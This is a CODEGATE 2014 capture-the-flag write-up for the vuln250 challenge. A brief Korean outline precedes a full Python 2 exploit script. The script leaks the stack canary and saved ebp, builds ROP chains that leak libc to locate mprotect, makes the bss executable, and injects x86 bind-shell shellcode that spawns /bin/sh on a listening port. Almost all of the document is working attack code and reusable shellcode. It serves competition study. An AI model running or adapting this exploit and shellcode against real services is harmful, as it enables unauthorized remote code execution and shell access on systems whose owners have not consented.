

CODEGATE 2014 vuln250 (angry_doreamon)

해당 문제의 exploit은 3개의 stage로 구성하였다.

 

stage1: canary와 ebp를 구하는 부분

 

stage2: write를 사용해 memory leak을 일으켜 mprotect 주소를 구하는 부분

 

stage3: mprotect로 bss 영역에 실행 권한을 부여하고, bind_tcp 쉘코드를 실행시키는 부분이다.

 

 

 

 

 

 

 

 

 

from socket import *

from struct import *

from time import sleep

 

 

# Python 2 exploit script from the CODEGATE 2014 vuln250 write-up above.
# 32-bit little-endian pack/unpack helpers ("<L" = unsigned long, LE).
p = lambda x : pack("<L", x)

up = lambda x : unpack("<L",x)[0]

# Lab target used in the write-up (a private-range address, not a public host).
HOST = "192.168.220.128"

PORT = 8888

# Fixed addresses inside the challenge binary. They sit in the 0x0804xxxx
# range, so the binary is presumably mapped at a constant base (not verified
# here); the whole exploit depends on that.
write_plt = 0x080486e0   # write@plt, called in stage 2 to leak the GOT entry

write_got = 0x0804b040   # write@got, the 4 bytes that stage 2 leaks

read_plt = 0x08048620    # read@plt, last call of the stage-3 chain

freespace = 0x0804b080   # buffer the stage-3 chain reads the shellcode into

# ROP gadget addresses; by their names, "pop;pop;pop;pop;ret" and "pop;ret".
# Only ppppr is used below (it discards the four words after the mprotect
# call); pr is defined but never referenced.
ppppr=0x080495bc

pr = 0x080495bf

# Descriptor handed to write()/read() by the ROP chains; presumably the
# client socket inside the target process — TODO confirm against the binary.
fd = 4

 

 

 

# Stage-3 payload: the bind_tcp shellcode the write-up refers to, kept as a
# raw Python 2 byte string. Its length sizes the read() at the end of the
# stage-3 chain (p(len(shellcode)) below), so the two must stay in sync.
shellcode=("\x31\xc0"+

            "\x50"+

            "\x40"+

            "\x89\xc3"+

            "\x50"+

            "\x40"+

            "\x50"+

            "\x89\xe1"+

            "\xb0\x66"+

            "\xcd\x80"+

            "\x31\xd2"+

            "\x52"+

            "\x66\x68\x13\xd2"+

            "\x43"+

            "\x66\x53"+

            "\x89\xe1"+

            "\x6a\x10"+

            "\x51"+

            "\x50"+

            "\x89\xe1"+

            "\xb0\x66"+

            "\xcd\x80"+

            "\x40"+

            "\x89\x44\x24\x04"+

            "\x43"+

            "\x43"+

            "\xb0\x66"+

            "\xcd\x80"+

            "\x83\xc4\x0c"+

            "\x52"+

            "\x52"+

            "\x43"+

            "\xb0\x66"+

            "\xcd\x80"+

            "\x93"+

            "\x89\xd1"+

            "\xb0\x3f"+

            "\xcd\x80"+

            "\x41"+

            "\x80\xf9\x03"+

            "\x75\xf6"+

            "\x52"+

            "\x68\x6e\x2f\x73\x68"+

            "\x68\x2f\x2f\x62\x69"+

            "\x89\xe3"+

            "\x52"+

            "\x53"+

            "\x89\xe1"+

            "\xb0\x0b"+

            "\xcd\x80")

 

 

# Stage 1: drive the service's menu so that it echoes back a buffer that
# contains the stack canary and the saved ebp. Each stage below opens its own
# connection; the later stages reuse the canary/ebp leaked here, which only
# works if both values are the same in every connection (presumably the
# service forks per client — not verified here).
print "[+]exploit start"

print "[+]stage1"

#stage1

s=socket()

s.connect((HOST,PORT))

# Drain the banner/menu text. Four reads matched the write-up's session; the
# contents are not inspected.
s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

# Menu choice "4" is the vulnerable option used by all three stages.
s.send("4")

s.recv(1024)

# 11 bytes of input; the reply is expected to carry the canary and saved ebp
# at fixed offsets (23..25 and 34..37) in this exact session.
s.send("yyyyyyyyyyy")

parse_string=s.recv(1024)

s.close()

sleep(0.1)

print "[+]get canary"

# The script assumes the canary's lowest byte is 0x00 (it is re-added here)
# and takes the remaining three bytes from the reply. There is no check that
# the reply is long enough; a short reply silently yields a short canary.
canary=""

canary+=chr(0x00)

canary+=(parse_string)[23:26]

print "[+]get ebp"

# Saved ebp as echoed by the service; reused verbatim in the stage-2 and
# stage-3 payloads.
ebp=""

ebp+=(parse_string)[34:38]

 

print "[+]stage2"

#stage2

# Stage-2 ROP payload. Stack layout implied by the offsets used here:
# 10 bytes filler, 4-byte canary, 8 bytes filler, saved ebp, return address.
# The chain is a single call, write(fd, write_got, 4), which sends the 4-byte
# GOT entry of write back over the socket. p(0) is where write() would
# return to; nothing further is needed on this connection.
payload = ""

payload += "a"*10

payload += canary

payload += "a"*8

payload += ebp

payload += p(write_plt)

payload += p(0)            # return address after write() (unused)

payload += p(fd)           # write(fd,

payload += p(write_got)    #       buf = write@got,

payload += p(4)            #       count = 4)

print "[+]reconnection"

s=socket()

s.connect((HOST,PORT))

# Same menu interaction as stage 1.
s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.send("4")

s.recv(1024)

print "[+]send payload"

s.send(payload)

sleep(1)

print "[+]get mprotect@libc"

# Exactly the 4 leaked bytes are expected; fewer would make up() raise.
write_libc=s.recv(4)

# 0xc9a0 is the write -> mprotect distance in the target's libc build; the
# constant is specific to that libc version.
mprotect=up(write_libc)+0xc9a0

print "[+]mprotect address:%s" %hex(mprotect)

s.close()

print "[+]preparation payload"

# Stage-3 ROP payload, same stack layout as stage 2. Chain:
#   mprotect(0x0804b000, 0x2000, 7)       page range containing freespace,
#                                         7 = PROT_READ|PROT_WRITE|PROT_EXEC
#   ppppr                                 pops the 3 args plus the ebp word
#   read(fd, freespace, len(shellcode))   places the shellcode in freespace
#   return into freespace                 executes it
payload = ""

payload += "a"*10

payload += canary

payload += "a"*8

payload += ebp

payload += p(mprotect)

payload += p(ppppr)        # mprotect's return address: pop x4 ; ret

payload += p(0x0804b000)   # mprotect(addr,

payload += p(0x2000)       #          len,

payload += p(7)            #          prot)

payload += ebp             # fourth word consumed by ppppr

payload += p(read_plt)

payload += p(freespace)    # read's return address: jump into the buffer

payload += p(fd)           # read(fd,

payload += p(freespace)    #      buf = freespace,

payload += p(len(shellcode))   # count = len(shellcode))

 

 

 

print "[+]stage3"

#stage3

# Stage 3: repeat the menu interaction, send the mprotect/read chain, then
# send the shellcode so the chain's read() stores it at freespace and returns
# into it.
print "[+]reconnection"

s=socket()

s.connect((HOST,PORT))

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.send("4")

s.recv(1024)

print "[+]send payload"

s.send(payload)

# Fixed delay so the chain reaches read() before the shellcode bytes arrive;
# timing-based, not acknowledged by the target.
sleep(1)

print "[+]send shellcode"

# Partial sends are not handled (send() rather than sendall()).
s.send(shellcode)

s.close()
